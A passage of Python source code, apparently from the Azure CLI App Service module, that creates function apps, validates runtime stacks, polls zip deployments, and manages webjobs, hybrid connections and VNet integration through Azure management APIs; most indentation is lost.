return client.app_service_plans.create_or_update(resource_group_name, name, plan_def)
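# Illustrative CLI usage for create_functionapp_app_service_plan above (placeholder values; exact
# flag names are an assumption -- check 'az functionapp plan create --help'):
#   az functionapp plan create -g MyResourceGroup -n MyPlan --sku EP1 --max-burst 10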
def is_plan_consumption(cmd, plan_info):
SkuDescription, AppServicePlan = cmd.get_models('SkuDescription', 'AppServicePlan')
if isinstance(plan_info, AppServicePlan):
if isinstance(plan_info.sku, SkuDescription):
return plan_info.sku.tier.lower() == 'dynamic'
return False
def is_plan_elastic_premium(cmd, plan_info):
SkuDescription, AppServicePlan = cmd.get_models('SkuDescription', 'AppServicePlan')
if isinstance(plan_info, AppServicePlan):
if isinstance(plan_info.sku, SkuDescription):
return plan_info.sku.tier == 'ElasticPremium'
return False
def validate_and_convert_to_int(flag, val):
try:
return int(val)
except ValueError:
raise CLIError("Usage error: {} is expected to have an int value.".format(flag))
def validate_range_of_int_flag(flag_name, value, min_val, max_val):
value = validate_and_convert_to_int(flag_name, value)
if min_val > value or value > max_val:
raise CLIError("Usage error: {} is expected to be between {} and {} (inclusive)".format(flag_name, min_val,
max_val))
return value
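# Worked examples for validate_range_of_int_flag above:
#   validate_range_of_int_flag('--max-burst', '10', min_val=0, max_val=20)  -> 10
#   validate_range_of_int_flag('--max-burst', '25', min_val=0, max_val=20)  raises CLIError (out of range)
#   validate_range_of_int_flag('--max-burst', 'ten', min_val=0, max_val=20) raises CLIError (not an int)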
def create_function(cmd, resource_group_name, name, storage_account, plan=None,
os_type=None, functions_version=None, runtime=None, runtime_version=None,
consumption_plan_location=None, app_insights=None, app_insights_key=None,
disable_app_insights=None, deployment_source_url=None,
deployment_source_branch='master', deployment_local_git=None,
docker_registry_server_password=None, docker_registry_server_user=None,
deployment_container_image_name=None, tags=None, assign_identities=None,
role='Contributor', scope=None):
# pylint: disable=too-many-statements, too-many-branches
if functions_version is None:
logger.warning("No functions version specified so defaulting to 2. In the future, specifying a version will "
"be required. To create a 2.x function you would pass in the flag `--functions-version 2`")
functions_version = '2'
if deployment_source_url and deployment_local_git:
raise CLIError('usage error: --deployment-source-url <url> | --deployment-local-git')
if bool(plan) == bool(consumption_plan_location):
raise CLIError("usage error: --plan NAME_OR_ID | --consumption-plan-location LOCATION")
SiteConfig, Site, NameValuePair = cmd.get_models('SiteConfig', 'Site', 'NameValuePair')
docker_registry_server_url = parse_docker_image_name(deployment_container_image_name)
disable_app_insights = (disable_app_insights == "true")
site_config = SiteConfig(app_settings=[])
functionapp_def = Site(location=None, site_config=site_config, tags=tags)
KEYS = FUNCTIONS_STACKS_API_KEYS()
client = web_client_factory(cmd.cli_ctx)
plan_info = None
if runtime is not None:
runtime = runtime.lower()
if consumption_plan_location:
locations = list_consumption_locations(cmd)
location = next((loc for loc in locations if loc['name'].lower() == consumption_plan_location.lower()), None)
if location is None:
raise CLIError("Location is invalid. Use: az functionapp list-consumption-locations")
functionapp_def.location = consumption_plan_location
functionapp_def.kind = 'functionapp'
# if os_type is None, the os type is windows
is_linux = os_type and os_type.lower() == 'linux'
else: # apps with SKU based plan
if is_valid_resource_id(plan):
parse_result = parse_resource_id(plan)
plan_info = client.app_service_plans.get(parse_result['resource_group'], parse_result['name'])
else:
plan_info = client.app_service_plans.get(resource_group_name, plan)
if not plan_info:
raise CLIError("The plan '{}' doesn't exist".format(plan))
location = plan_info.location
is_linux = plan_info.reserved
functionapp_def.server_farm_id = plan
functionapp_def.location = location
if functions_version == '2' and functionapp_def.location in FUNCTIONS_NO_V2_REGIONS:
raise CLIError("2.x functions are not supported in this region. To create a 3.x function, "
"pass in the flag '--functions-version 3'")
if is_linux and not runtime and (consumption_plan_location or not deployment_container_image_name):
raise CLIError(
"usage error: --runtime RUNTIME required for linux functions apps without custom image.")
runtime_stacks_json = _load_runtime_stacks_json_functionapp(is_linux)
if runtime is None and runtime_version is not None:
raise CLIError('Must specify --runtime to use --runtime-version')
# get the matching runtime stack object
runtime_json = _get_matching_runtime_json_functionapp(runtime_stacks_json, runtime if runtime else 'dotnet')
if not runtime_json:
# no matching runtime for os
os_string = "linux" if is_linux else "windows"
supported_runtimes = list(map(lambda x: x[KEYS.NAME], runtime_stacks_json))
raise CLIError("usage error: Currently supported runtimes (--runtime) in {} function apps are: {}."
.format(os_string, ', '.join(supported_runtimes)))
runtime_version_json = _get_matching_runtime_version_json_functionapp(runtime_json,
functions_version,
runtime_version,
is_linux)
if not runtime_version_json:
supported_runtime_versions = list(map(lambda x: x[KEYS.DISPLAY_VERSION],
_get_supported_runtime_versions_functionapp(runtime_json,
functions_version)))
if runtime_version:
if runtime == 'dotnet':
raise CLIError('--runtime-version is not supported for --runtime dotnet. Dotnet version is determined '
'by --functions-version. Dotnet version {} is not supported by Functions version {}.'
.format(runtime_version, functions_version))
raise CLIError('--runtime-version {} is not supported for the selected --runtime {} and '
'--functions-version {}. Supported versions are: {}.'
.format(runtime_version,
runtime,
functions_version,
', '.join(supported_runtime_versions)))
# if runtime_version was not specified, then that runtime is not supported for that functions version
raise CLIError('no supported --runtime-version found for the selected --runtime {} and '
'--functions-version {}'
.format(runtime, functions_version))
if runtime == 'dotnet':
logger.warning('--runtime-version is not supported for --runtime dotnet. Dotnet version is determined by '
'--functions-version. Dotnet version will be %s for this function app.',
runtime_version_json[KEYS.DISPLAY_VERSION])
if runtime_version_json[KEYS.IS_DEPRECATED]:
logger.warning('%s version %s has been deprecated. In the future, this version will be unavailable. '
'Please update your command to use a more recent version. For a list of supported '
'--runtime-versions, run \"az functionapp create -h\"',
runtime_json[KEYS.PROPERTIES][KEYS.DISPLAY], runtime_version_json[KEYS.DISPLAY_VERSION])
site_config_json = runtime_version_json[KEYS.SITE_CONFIG_DICT]
app_settings_json = runtime_version_json[KEYS.APP_SETTINGS_DICT]
con_string = _validate_and_get_connection_string(cmd.cli_ctx, resource_group_name, storage_account)
if is_linux:
functionapp_def.kind = 'functionapp,linux'
functionapp_def.reserved = True
is_consumption = consumption_plan_location is not None
if not is_consumption:
site_config.app_settings.append(NameValuePair(name='MACHINEKEY_DecryptionKey',
value=str(hexlify(urandom(32)).decode()).upper()))
if deployment_container_image_name:
functionapp_def.kind = 'functionapp,linux,container'
site_config.app_settings.append(NameValuePair(name='DOCKER_CUSTOM_IMAGE_NAME',
value=deployment_container_image_name))
site_config.app_settings.append(NameValuePair(name='FUNCTION_APP_EDIT_MODE', value='readOnly'))
site_config.app_settings.append(NameValuePair(name='WEBSITES_ENABLE_APP_SERVICE_STORAGE',
value='false'))
site_config.linux_fx_version = _format_fx_version(deployment_container_image_name)
# clear all runtime specific configs and settings
site_config_json = {KEYS.USE_32_BIT_WORKER_PROC: False}
app_settings_json = {}
# ensure that app insights is created if not disabled
runtime_version_json[KEYS.APPLICATION_INSIGHTS] = True
else:
site_config.app_settings.append(NameValuePair(name='WEBSITES_ENABLE_APP_SERVICE_STORAGE',
value='true'))
else:
functionapp_def.kind = 'functionapp'
# set site configs
for prop, value in site_config_json.items():
snake_case_prop = _convert_camel_to_snake_case(prop)
setattr(site_config, snake_case_prop, value)
# adding app settings
for app_setting, value in app_settings_json.items():
site_config.app_settings.append(NameValuePair(name=app_setting, value=value))
site_config.app_settings.append(NameValuePair(name='FUNCTIONS_EXTENSION_VERSION',
value=_get_extension_version_functionapp(functions_version)))
site_config.app_settings.append(NameValuePair(name='AzureWebJobsStorage', value=con_string))
# If plan is not consumption or elastic premium, we need to set always on
if consumption_plan_location is None and not is_plan_elastic_premium(cmd, plan_info):
site_config.always_on = True
# If plan is elastic premium or windows consumption, we need these app settings
is_windows_consumption = consumption_plan_location is not None and not is_linux
if is_plan_elastic_premium(cmd, plan_info) or is_windows_consumption:
site_config.app_settings.append(NameValuePair(name='WEBSITE_CONTENTAZUREFILECONNECTIONSTRING',
value=con_string))
site_config.app_settings.append(NameValuePair(name='WEBSITE_CONTENTSHARE', value=name.lower()))
create_app_insights = False
if app_insights_key is not None:
site_config.app_settings.append(NameValuePair(name='APPINSIGHTS_INSTRUMENTATIONKEY',
value=app_insights_key))
elif app_insights is not None:
instrumentation_key = get_app_insights_key(cmd.cli_ctx, resource_group_name, app_insights)
site_config.app_settings.append(NameValuePair(name='APPINSIGHTS_INSTRUMENTATIONKEY',
value=instrumentation_key))
elif disable_app_insights or not runtime_version_json[KEYS.APPLICATION_INSIGHTS]:
# set up dashboard if no app insights
site_config.app_settings.append(NameValuePair(name='AzureWebJobsDashboard', value=con_string))
elif not disable_app_insights and runtime_version_json[KEYS.APPLICATION_INSIGHTS]:
create_app_insights = True
poller = client.web_apps.create_or_update(resource_group_name, name, functionapp_def)
functionapp = LongRunningOperation(cmd.cli_ctx)(poller)
if consumption_plan_location and is_linux:
        logger.warning("Your Linux function app '%s', which uses a consumption plan, has been successfully "
                       "created but is not active until content is published using "
                       "the Azure Portal or the Functions Core Tools.", name)
else:
_set_remote_or_local_git(cmd, functionapp, resource_group_name, name, deployment_source_url,
deployment_source_branch, deployment_local_git)
if create_app_insights:
try:
try_create_application_insights(cmd, functionapp)
except Exception: # pylint: disable=broad-except
logger.warning('Error while trying to create and configure an Application Insights for the Function App. '
'Please use the Azure Portal to create and configure the Application Insights, if needed.')
update_app_settings(cmd, functionapp.resource_group, functionapp.name,
['AzureWebJobsDashboard={}'.format(con_string)])
if deployment_container_image_name:
update_container_settings_functionapp(cmd, resource_group_name, name, docker_registry_server_url,
deployment_container_image_name, docker_registry_server_user,
docker_registry_server_password)
if assign_identities is not None:
identity = assign_identity(cmd, resource_group_name, name, assign_identities,
role, None, scope)
functionapp.identity = identity
return functionapp
def _load_runtime_stacks_json_functionapp(is_linux):
KEYS = FUNCTIONS_STACKS_API_KEYS()
if is_linux:
return get_file_json(FUNCTIONS_STACKS_API_JSON_PATHS['linux'])[KEYS.VALUE]
return get_file_json(FUNCTIONS_STACKS_API_JSON_PATHS['windows'])[KEYS.VALUE]
def _get_matching_runtime_json_functionapp(stacks_json, runtime):
KEYS = FUNCTIONS_STACKS_API_KEYS()
matching_runtime_json = list(filter(lambda x: x[KEYS.NAME] == runtime, stacks_json))
if matching_runtime_json:
return matching_runtime_json[0]
return None
def _get_supported_runtime_versions_functionapp(runtime_json, functions_version):
KEYS = FUNCTIONS_STACKS_API_KEYS()
extension_version = _get_extension_version_functionapp(functions_version)
supported_versions_list = []
for runtime_version_json in runtime_json[KEYS.PROPERTIES][KEYS.MAJOR_VERSIONS]:
if extension_version in runtime_version_json[KEYS.SUPPORTED_EXTENSION_VERSIONS]:
supported_versions_list.append(runtime_version_json)
return supported_versions_list
def _get_matching_runtime_version_json_functionapp(runtime_json, functions_version, runtime_version, is_linux):
KEYS = FUNCTIONS_STACKS_API_KEYS()
extension_version = _get_extension_version_functionapp(functions_version)
if runtime_version:
for runtime_version_json in runtime_json[KEYS.PROPERTIES][KEYS.MAJOR_VERSIONS]:
if (runtime_version_json[KEYS.DISPLAY_VERSION] == runtime_version and
extension_version in runtime_version_json[KEYS.SUPPORTED_EXTENSION_VERSIONS]):
return runtime_version_json
return None
# find the matching default runtime version
supported_versions_list = _get_supported_runtime_versions_functionapp(runtime_json, functions_version)
default_version_json = {}
default_version = 0.0
for current_runtime_version_json in supported_versions_list:
if current_runtime_version_json[KEYS.IS_DEFAULT]:
current_version = _get_runtime_version_functionapp(current_runtime_version_json[KEYS.RUNTIME_VERSION],
is_linux)
if not default_version_json or default_version < current_version:
default_version_json = current_runtime_version_json
default_version = current_version
return default_version_json
def _get_extension_version_functionapp(functions_version):
if functions_version is not None:
return '~{}'.format(functions_version)
return '~2'
def _get_app_setting_set_functionapp(site_config, app_setting):
return list(filter(lambda x: x.name == app_setting, site_config.app_settings))
def _convert_camel_to_snake_case(text):
return reduce(lambda x, y: x + ('_' if y.isupper() else '') + y, text).lower()
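# Worked examples for _convert_camel_to_snake_case above (used to map stack API config keys
# onto SiteConfig attribute names):
#   _convert_camel_to_snake_case('linuxFxVersion')        -> 'linux_fx_version'
#   _convert_camel_to_snake_case('use32BitWorkerProcess') -> 'use32_bit_worker_process'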
def _get_runtime_version_functionapp(version_string, is_linux):
import re
windows_match = re.fullmatch(FUNCTIONS_WINDOWS_RUNTIME_VERSION_REGEX, version_string)
if windows_match:
return float(windows_match.group(1))
linux_match = re.fullmatch(FUNCTIONS_LINUX_RUNTIME_VERSION_REGEX, version_string)
if linux_match:
return float(linux_match.group(1))
try:
return float(version_string)
except ValueError:
return 0
def try_create_application_insights(cmd, functionapp):
creation_failed_warn = 'Unable to create the Application Insights for the Function App. ' \
'Please use the Azure Portal to manually create and configure the Application Insights, ' \
'if needed.'
ai_resource_group_name = functionapp.resource_group
ai_name = functionapp.name
ai_location = functionapp.location
app_insights_client = get_mgmt_service_client(cmd.cli_ctx, ApplicationInsightsManagementClient)
ai_properties = {
"name": ai_name,
"location": ai_location,
"kind": "web",
"properties": {
"Application_Type": "web"
}
}
appinsights = app_insights_client.components.create_or_update(ai_resource_group_name, ai_name, ai_properties)
if appinsights is None or appinsights.instrumentation_key is None:
logger.warning(creation_failed_warn)
return
    # Emit this success message as a warning so it does not interfere with regular JSON output on stdout
logger.warning('Application Insights \"%s\" was created for this Function App. '
'You can visit https://portal.azure.com/#resource%s/overview to view your '
'Application Insights component', appinsights.name, appinsights.id)
update_app_settings(cmd, functionapp.resource_group, functionapp.name,
['APPINSIGHTS_INSTRUMENTATIONKEY={}'.format(appinsights.instrumentation_key)])
def _set_remote_or_local_git(cmd, webapp, resource_group_name, name, deployment_source_url=None,
deployment_source_branch='master', deployment_local_git=None):
if deployment_source_url:
logger.warning("Linking to git repository '%s'", deployment_source_url)
try:
config_source_control(cmd, resource_group_name, name, deployment_source_url, 'git',
deployment_source_branch, manual_integration=True)
except Exception as ex: # pylint: disable=broad-except
ex = ex_handler_factory(no_throw=True)(ex)
logger.warning("Link to git repository failed due to error '%s'", ex)
if deployment_local_git:
local_git_info = enable_local_git(cmd, resource_group_name, name)
logger.warning("Local git is configured with url of '%s'", local_git_info['url'])
setattr(webapp, 'deploymentLocalGitUrl', local_git_info['url'])
def _validate_and_get_connection_string(cli_ctx, resource_group_name, storage_account):
sa_resource_group = resource_group_name
if is_valid_resource_id(storage_account):
sa_resource_group = parse_resource_id(storage_account)['resource_group']
storage_account = parse_resource_id(storage_account)['name']
storage_client = get_mgmt_service_client(cli_ctx, StorageManagementClient)
storage_properties = storage_client.storage_accounts.get_properties(sa_resource_group,
storage_account)
error_message = ''
endpoints = storage_properties.primary_endpoints
sku = storage_properties.sku.name
allowed_storage_types = ['Standard_GRS', 'Standard_RAGRS', 'Standard_LRS', 'Standard_ZRS', 'Premium_LRS']
for e in ['blob', 'queue', 'table']:
if not getattr(endpoints, e, None):
error_message = "Storage account '{}' has no '{}' endpoint. It must have table, queue, and blob endpoints all enabled".format(storage_account, e) # pylint: disable=line-too-long
if sku not in allowed_storage_types:
error_message += 'Storage type {} is not allowed'.format(sku)
if error_message:
raise CLIError(error_message)
obj = storage_client.storage_accounts.list_keys(sa_resource_group, storage_account) # pylint: disable=no-member
try:
keys = [obj.keys[0].value, obj.keys[1].value] # pylint: disable=no-member
except AttributeError:
# Older API versions have a slightly different structure
keys = [obj.key1, obj.key2] # pylint: disable=no-member
endpoint_suffix = cli_ctx.cloud.suffixes.storage_endpoint
connection_string = 'DefaultEndpointsProtocol={};EndpointSuffix={};AccountName={};AccountKey={}'.format(
"https",
endpoint_suffix,
storage_account,
keys[0]) # pylint: disable=no-member
return connection_string
def list_consumption_locations(cmd):
client = web_client_factory(cmd.cli_ctx)
regions = client.list_geo_regions(sku='Dynamic')
return [{'name': x.name.lower().replace(' ', '')} for x in regions]
def list_locations(cmd, sku, linux_workers_enabled=None):
web_client = web_client_factory(cmd.cli_ctx)
full_sku = get_sku_name(sku)
web_client_geo_regions = web_client.list_geo_regions(sku=full_sku, linux_workers_enabled=linux_workers_enabled)
providers_client = providers_client_factory(cmd.cli_ctx)
providers_client_locations_list = getattr(providers_client.get('Microsoft.Web'), 'resource_types', [])
for resource_type in providers_client_locations_list:
if resource_type.resource_type == 'sites':
providers_client_locations_list = resource_type.locations
break
return [geo_region for geo_region in web_client_geo_regions if geo_region.name in providers_client_locations_list]
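# Kudu deployment status codes handled by _check_zip_deployment_status below, as inferred from its
# checks: 3 => deployment failed, 4 => deployment succeeded; anything else once the polling window
# is exhausted is treated as a timeout.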
def _check_zip_deployment_status(cmd, rg_name, name, deployment_status_url, authorization, timeout=None):
import requests
from azure.cli.core.util import should_disable_connection_verify
total_trials = (int(timeout) // 2) if timeout else 450
num_trials = 0
while num_trials < total_trials:
time.sleep(2)
response = requests.get(deployment_status_url, headers=authorization,
verify=not should_disable_connection_verify())
try:
res_dict = response.json()
except json.decoder.JSONDecodeError:
logger.warning("Deployment status endpoint %s returns malformed data. Retrying...", deployment_status_url)
res_dict = {}
finally:
num_trials = num_trials + 1
if res_dict.get('status', 0) == 3:
_configure_default_logging(cmd, rg_name, name)
raise CLIError("Zip deployment failed. {}. Please run the command az webapp log deployment show "
"-n {} -g {}".format(res_dict, name, rg_name))
if res_dict.get('status', 0) == 4:
break
if 'progress' in res_dict:
logger.info(res_dict['progress']) # show only in debug mode, customers seem to find this confusing
# if the deployment is taking longer than expected
if res_dict.get('status', 0) != 4:
_configure_default_logging(cmd, rg_name, name)
        raise CLIError("""Timeout reached by the command; however, the deployment operation
                is still ongoing. Navigate to your SCM site to check the deployment status""")
return res_dict
def list_continuous_webjobs(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_continuous_web_jobs', slot)
def start_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.start_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.get_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
client.web_apps.start_continuous_web_job(resource_group_name, name, webjob_name)
return client.web_apps.get_continuous_web_job(resource_group_name, name, webjob_name)
def stop_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.stop_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.get_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
client.web_apps.stop_continuous_web_job(resource_group_name, name, webjob_name)
return client.web_apps.get_continuous_web_job(resource_group_name, name, webjob_name)
def remove_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.delete_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.delete_continuous_web_job(resource_group_name, name, webjob_name)
def list_triggered_webjobs(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_triggered_web_jobs', slot)
def run_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.run_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.get_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
client.web_apps.run_triggered_web_job(resource_group_name, name, webjob_name)
return client.web_apps.get_triggered_web_job(resource_group_name, name, webjob_name)
def remove_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.delete_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.delete_triggered_web_job(resource_group_name, name, webjob_name)
def list_hc(cmd, name, resource_group_name, slot=None):
linux_webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = linux_webapp.reserved
if is_linux:
        return logger.warning("Hybrid connections are not supported on Linux apps.")
client = web_client_factory(cmd.cli_ctx)
if slot is None:
listed_vals = client.web_apps.list_hybrid_connections(resource_group_name, name)
else:
listed_vals = client.web_apps.list_hybrid_connections_slot(resource_group_name, name, slot)
# reformats hybrid connection, to prune unnecessary fields
mod_list = []
for x in listed_vals.additional_properties["value"]:
properties = x["properties"]
resourceGroup = x["id"].split("/")
mod_hc = {
"id": x["id"],
"location": x["location"],
"name": x["name"],
"properties": {
"hostname": properties["hostname"],
"port": properties["port"],
"relayArmUri": properties["relayArmUri"],
"relayName": properties["relayName"],
"serviceBusNamespace": properties["serviceBusNamespace"],
"serviceBusSuffix": properties["serviceBusSuffix"]
},
"resourceGroup": resourceGroup[4],
"type": x["type"]
}
mod_list.append(mod_hc)
return mod_list
def add_hc(cmd, name, resource_group_name, namespace, hybrid_connection, slot=None):
HybridConnection = cmd.get_models('HybridConnection')
linux_webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = linux_webapp.reserved
if is_linux:
        return logger.warning("Hybrid connections are not supported on Linux apps.")
web_client = web_client_factory(cmd.cli_ctx)
hy_co_client = hycos_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
namespace_client = namespaces_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
hy_co_id = ''
for n in namespace_client.list():
if n.name == namespace:
hy_co_id = n.id
i = 0
hy_co_resource_group = ''
hy_co_split = hy_co_id.split("/")
for z in hy_co_split:
if z == "resourceGroups":
hy_co_resource_group = hy_co_split[i + 1]
i = i + 1
# calling the relay API to get information about the hybrid connection
hy_co = hy_co_client.get(hy_co_resource_group, namespace, hybrid_connection)
# if the hybrid connection does not have a default sender authorization
# rule, create it
hy_co_rules = hy_co_client.list_authorization_rules(hy_co_resource_group, namespace, hybrid_connection)
has_default_sender_key = False
for r in hy_co_rules:
if r.name.lower() == "defaultsender":
for z in r.rights:
if z == z.send:
has_default_sender_key = True
if not has_default_sender_key:
rights = [AccessRights.send]
hy_co_client.create_or_update_authorization_rule(hy_co_resource_group, namespace, hybrid_connection,
"defaultSender", rights)
hy_co_keys = hy_co_client.list_keys(hy_co_resource_group, namespace, hybrid_connection, "defaultSender")
hy_co_info = hy_co.id
hy_co_metadata = ast.literal_eval(hy_co.user_metadata)
hy_co_hostname = ''
for x in hy_co_metadata:
if x["key"] == "endpoint":
hy_co_hostname = x["value"]
hostname_parts = hy_co_hostname.split(":")
hostname = hostname_parts[0]
port = hostname_parts[1]
id_parameters = hy_co_info.split("/")
# populate object with information from the hybrid connection, and set it
# on webapp
hc = HybridConnection(service_bus_namespace=id_parameters[8],
relay_name=hybrid_connection,
relay_arm_uri=hy_co_info,
hostname=hostname,
port=port,
send_key_name="defaultSender",
send_key_value=hy_co_keys.primary_key,
service_bus_suffix=".servicebus.windows.net")
if slot is None:
return_hc = web_client.web_apps.create_or_update_hybrid_connection(resource_group_name, name, namespace,
hybrid_connection, hc)
else:
return_hc = web_client.web_apps.create_or_update_hybrid_connection_slot(resource_group_name, name, namespace,
hybrid_connection, hc, slot)
# reformats hybrid connection, to prune unnecessary fields
resourceGroup = return_hc.id.split("/")
mod_hc = {
"hostname": return_hc.hostname,
"id": return_hc.id,
"location": return_hc.additional_properties["location"],
"name": return_hc.name,
"port": return_hc.port,
"relayArmUri": return_hc.relay_arm_uri,
"resourceGroup": resourceGroup[4],
"serviceBusNamespace": return_hc.service_bus_namespace,
"serviceBusSuffix": return_hc.service_bus_suffix
}
return mod_hc
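# Illustrative CLI usage for add_hc above (placeholder values; assumes the
# 'az webapp hybrid-connection add' command surface):
#   az webapp hybrid-connection add -g MyResourceGroup -n MyWebApp \
#       --namespace MyRelayNamespace --hybrid-connection MyHybridConnection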
# set the key the apps use to connect with the hybrid connection
def set_hc_key(cmd, plan, resource_group_name, namespace, hybrid_connection, key_type):
HybridConnection = cmd.get_models('HybridConnection')
web_client = web_client_factory(cmd.cli_ctx)
# extract the hybrid connection resource group
asp_hy_co = web_client.app_service_plans.get_hybrid_connection(resource_group_name, plan,
namespace, hybrid_connection)
arm_uri = asp_hy_co.relay_arm_uri
split_uri = arm_uri.split("resourceGroups/")
resource_group_strings = split_uri[1].split('/')
relay_resource_group = resource_group_strings[0]
hy_co_client = hycos_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
# calling the relay function to obtain information about the hc in question
hy_co = hy_co_client.get(relay_resource_group, namespace, hybrid_connection)
# if the hybrid connection does not have a default sender authorization
# rule, create it
hy_co_rules = hy_co_client.list_authorization_rules(relay_resource_group, namespace, hybrid_connection)
has_default_sender_key = False
for r in hy_co_rules:
if r.name.lower() == "defaultsender":
for z in r.rights:
if z == z.send:
has_default_sender_key = True
if not has_default_sender_key:
rights = [AccessRights.send]
hy_co_client.create_or_update_authorization_rule(relay_resource_group, namespace, hybrid_connection,
"defaultSender", rights)
hy_co_keys = hy_co_client.list_keys(relay_resource_group, namespace, hybrid_connection, "defaultSender")
hy_co_metadata = ast.literal_eval(hy_co.user_metadata)
    hy_co_hostname = ''
for x in hy_co_metadata:
if x["key"] == "endpoint":
hy_co_hostname = x["value"]
hostname_parts = hy_co_hostname.split(":")
hostname = hostname_parts[0]
port = hostname_parts[1]
key = "empty"
if key_type.lower() == "primary":
key = hy_co_keys.primary_key
elif key_type.lower() == "secondary":
key = hy_co_keys.secondary_key
    # ensure the key type input is valid
if key == "empty":
logger.warning("Key type is invalid - must be primary or secondary")
return
apps = web_client.app_service_plans.list_web_apps_by_hybrid_connection(resource_group_name, plan, namespace,
hybrid_connection)
# changes the key for every app that uses that hybrid connection
for x in apps:
app_info = ast.literal_eval(x)
app_name = app_info["name"]
app_id = app_info["id"]
id_split = app_id.split("/")
app_resource_group = id_split[4]
hc = HybridConnection(service_bus_namespace=namespace, relay_name=hybrid_connection,
relay_arm_uri=arm_uri, hostname=hostname, port=port, send_key_name="defaultSender",
send_key_value=key)
web_client.web_apps.update_hybrid_connection(app_resource_group, app_name, namespace,
hybrid_connection, hc)
return web_client.app_service_plans.list_web_apps_by_hybrid_connection(resource_group_name, plan,
namespace, hybrid_connection)
def appservice_list_vnet(cmd, resource_group_name, plan):
web_client = web_client_factory(cmd.cli_ctx)
return web_client.app_service_plans.list_vnets(resource_group_name, plan)
def remove_hc(cmd, resource_group_name, name, namespace, hybrid_connection, slot=None):
linux_webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = linux_webapp.reserved
if is_linux:
        return logger.warning("Hybrid connections are not supported on Linux apps.")
client = web_client_factory(cmd.cli_ctx)
if slot is None:
return_hc = client.web_apps.delete_hybrid_connection(resource_group_name, name, namespace, hybrid_connection)
else:
return_hc = client.web_apps.delete_hybrid_connection_slot(resource_group_name, name, namespace,
hybrid_connection, slot)
return return_hc
def list_vnet_integration(cmd, name, resource_group_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot is None:
result = list(client.web_apps.list_vnet_connections(resource_group_name, name))
else:
result = list(client.web_apps.list_vnet_connections_slot(resource_group_name, name, slot))
mod_list = []
    # reformats the vnet entry, removing unnecessary information
for x in result:
# removes GUIDs from name and id
longName = x.name
if '_' in longName:
usIndex = longName.index('_')
shortName = longName[usIndex + 1:]
else:
shortName = longName
v_id = x.id
lastSlash = v_id.rindex('/')
shortId = v_id[:lastSlash] + '/' + shortName
# extracts desired fields
certThumbprint = x.cert_thumbprint
location = x.additional_properties["location"]
v_type = x.type
vnet_resource_id = x.vnet_resource_id
id_strings = v_id.split('/')
resourceGroup = id_strings[4]
routes = x.routes
vnet_mod = {"certThumbprint": certThumbprint,
"id": shortId,
"location": location,
"name": shortName,
"resourceGroup": resourceGroup,
"routes": routes,
"type": v_type,
"vnetResourceId": vnet_resource_id}
mod_list.append(vnet_mod)
return mod_list
def add_vnet_integration(cmd, name, resource_group_name, vnet, subnet, slot=None):
SwiftVirtualNetwork = cmd.get_models('SwiftVirtualNetwork')
Delegation = cmd.get_models('Delegation', resource_type=ResourceType.MGMT_NETWORK)
client = web_client_factory(cmd.cli_ctx)
vnet_client = network_client_factory(cmd.cli_ctx)
list_all_vnets = vnet_client.virtual_networks.list_all()
vnets = []
for v in list_all_vnets:
if vnet in (v.name, v.id):
vnet_details = parse_resource_id(v.id)
vnet_resource_group = vnet_details['resource_group']
vnets.append((v.id, v.name, vnet_resource_group))
if not vnets:
return logger.warning("The virtual network %s was not found in the subscription.", vnet)
# If more than one vnet, try to use one from same resource group. Otherwise, use first and log the vnet resource id
found_vnet = [v for v in vnets if v[2].lower() == resource_group_name.lower()]
if not found_vnet:
found_vnet = [vnets[0]]
(vnet_id, vnet, vnet_resource_group) = found_vnet[0]
if len(vnets) > 1:
logger.warning("Multiple virtual networks of name %s were found. Using virtual network with resource ID: %s. "
"To use a different virtual network, specify the virtual network resource ID using --vnet.",
vnet, vnet_id)
if slot is None:
swift_connection_info = client.web_apps.get_swift_virtual_network_connection(resource_group_name, name)
else:
swift_connection_info = client.web_apps.get_swift_virtual_network_connection_slot(resource_group_name,
name, slot)
# check to see if the connection would be supported
if swift_connection_info.swift_supported is not True:
return logger.warning("""Your app must be in an Azure App Service deployment that is
capable of scaling up to Premium v2\nLearn more:
https://go.microsoft.com/fwlink/?linkid=2060115&clcid=0x409""")
subnetObj = vnet_client.subnets.get(vnet_resource_group, vnet, subnet)
delegations = subnetObj.delegations
delegated = False
for d in delegations:
if d.service_name.lower() == "microsoft.web/serverfarms".lower():
delegated = True
if not delegated:
subnetObj.delegations = [Delegation(name="delegation", service_name="Microsoft.Web/serverFarms")]
vnet_client.subnets.create_or_update(vnet_resource_group, vnet, subnet,
subnet_parameters=subnetObj)
id_subnet = vnet_client.subnets.get(vnet_resource_group, vnet, subnet)
subnet_resource_id = id_subnet.id
swiftVnet = SwiftVirtualNetwork(subnet_resource_id=subnet_resource_id,
swift_supported=True)
if slot is None:
return_vnet = client.web_apps.create_or_update_swift_virtual_network_connection(resource_group_name, name,
swiftVnet)
else:
return_vnet = client.web_apps.create_or_update_swift_virtual_network_connection_slot(resource_group_name, name,
